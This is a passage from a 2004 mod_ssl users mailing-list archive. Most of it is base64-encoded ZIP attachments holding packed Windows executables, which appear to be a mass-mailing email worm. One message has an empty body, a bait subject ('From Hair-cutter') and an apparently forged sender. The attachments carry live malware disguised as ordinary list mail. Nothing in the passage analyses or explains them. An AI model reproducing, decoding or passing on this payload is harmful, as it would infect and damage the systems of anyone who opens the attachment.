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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAADAolsw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAbXlmZW9vc2wuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------ourncwulhtafdrrnisax--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 28 03:52:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 09A46A8948; Sat, 28 Feb 2004 03:52:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CLS-TORG1010-24 (torg1010-24.its.vt.edu [128.173.44.188])
	by master.modssl.org (Postfix) with SMTP id 245B5A8934
	for ; Sat, 28 Feb 2004 03:52:38 +0100 (CET)
Date: Fri, 27 Feb 2004 21:52:37 -0500
To: modssl-users@modssl.org
Subject: From Hair-cutter
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------yhyutepmaggcsyovgiie"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------yhyutepmaggcsyovgiie
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------yhyutepmaggcsyovgiie
Content-Type: application/octet-stream; name="ccbacaa.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="dbadcda.zip"

UEsDBAoAAAAAAMCtWzBKH8ydAD4AAAA+AAAMAAAAcHBrb2Zrc2EuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwBCRUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
ABAAAADAAAAABgAAADgAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAMS4yNABVUFghDAkCCIWlHAXMc5u5GZQAAKgwAAAAbgAAJgAANP/b//9Vi+yDxOhT/3UI
